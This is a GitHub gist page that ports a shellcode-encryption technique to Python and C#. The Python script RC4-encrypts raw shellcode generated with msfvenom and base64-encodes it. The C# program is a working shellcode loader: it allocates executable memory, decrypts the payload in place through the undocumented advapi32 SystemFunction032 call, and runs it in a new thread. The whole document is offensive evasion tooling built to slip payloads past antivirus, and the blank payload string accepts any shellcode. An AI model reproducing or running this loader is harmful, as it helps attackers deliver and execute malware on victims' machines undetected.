-
-
Save snovvcrash/3533d950be2d96cf52131e8393794d99 to your computer and use it in GitHub Desktop.
A port of [ https://s3cur3th1ssh1t.github.io/SystemFunction032_Shellcode ] to Python and C#
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python3 | |
from typing import Iterator | |
from base64 import b64encode | |
# Stolen from: https://gist.github.com/hsauers5/491f9dde975f1eaa97103427eda50071 | |
def key_scheduling(key: bytes) -> list[int]: | |
sched = [i for i in range(0, 256)] | |
i = 0 | |
for j in range(0, 256): | |
i = (i + sched[j] + key[j % len(key)]) % 256 | |
tmp = sched[j] | |
sched[j] = sched[i] | |
sched[i] = tmp | |
return sched | |
def stream_generation(sched: list[int]) -> Iterator[bytes]: | |
i, j = 0, 0 | |
while True: | |
i = (1 + i) % 256 | |
j = (sched[i] + j) % 256 | |
tmp = sched[j] | |
sched[j] = sched[i] | |
sched[i] = tmp | |
yield sched[(sched[i] + sched[j]) % 256] | |
def encrypt(plaintext: bytes, key: bytes) -> bytes: | |
sched = key_scheduling(key) | |
key_stream = stream_generation(sched) | |
ciphertext = b'' | |
for char in plaintext: | |
enc = char ^ next(key_stream) | |
ciphertext += bytes([enc]) | |
return ciphertext | |
if __name__ == '__main__': | |
# msfvenom -p windows/x64/exec CMD=calc.exe -f raw -o calc.bin | |
with open('calc.bin', 'rb') as f: | |
result = encrypt(plaintext=f.read(), key=b'aaaaaaaaaaaaaaaa') | |
print(b64encode(result).decode()) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
using System; | |
using System.Text; | |
using System.Runtime.InteropServices; | |
namespace RunShellcodeRC4 | |
{ | |
public class Program | |
{ | |
[DllImport("kernel32.dll", SetLastError = true, ExactSpelling = true)] | |
static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); | |
[DllImport("kernel32.dll")] | |
static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); | |
[DllImport("kernel32.dll")] | |
static extern uint WaitForSingleObject(IntPtr hHandle, uint dwMilliseconds); | |
[DllImport("advapi32.dll", CharSet = CharSet.Auto, SetLastError = false, EntryPoint = "SystemFunction032")] | |
static extern int SystemFunction032(ref CRYPTO_BUFFER data, ref CRYPTO_BUFFER key); | |
[StructLayout(LayoutKind.Sequential)] | |
struct CRYPTO_BUFFER | |
{ | |
public uint Length; | |
public uint MaximumLength; | |
public IntPtr Buffer; | |
} | |
// Stolen from: https://github.com/vletoux/MakeMeEnterpriseAdmin/blob/0e3dcfd55be8ac5fde1631d0f50753a761927082/MakeMeEnterpriseAdmin.ps1#L98-L125 | |
static int RtlEncryptDecryptRC4(IntPtr input, byte[] key, int lengh) | |
{ | |
CRYPTO_BUFFER dataBuffer = new CRYPTO_BUFFER(); | |
dataBuffer.Length = dataBuffer.MaximumLength = (uint)lengh; | |
dataBuffer.Buffer = input; | |
CRYPTO_BUFFER keyBuffer = new CRYPTO_BUFFER(); | |
keyBuffer.Length = keyBuffer.MaximumLength = (uint)key.Length; | |
keyBuffer.Buffer = Marshal.AllocHGlobal(key.Length); | |
Marshal.Copy(key, 0, keyBuffer.Buffer, key.Length); | |
int ret = SystemFunction032(ref dataBuffer, ref keyBuffer); | |
Marshal.FreeHGlobal(keyBuffer.Buffer); | |
return ret; | |
} | |
public static void Main() | |
{ | |
var key = Encoding.UTF8.GetBytes("aaaaaaaaaaaaaaaa"); | |
var buf = Convert.FromBase64String(""); | |
IntPtr alloc = VirtualAlloc(IntPtr.Zero, 0x1000, 0x3000, 0x40); | |
Marshal.Copy(buf, 0, alloc, buf.Length); | |
_ = RtlEncryptDecryptRC4(alloc, key, buf.Length); | |
IntPtr hThread = CreateThread(IntPtr.Zero, 0, alloc, IntPtr.Zero, 0, IntPtr.Zero); | |
WaitForSingleObject(hThread, 0xFFFFFFFF); | |
} | |
} | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment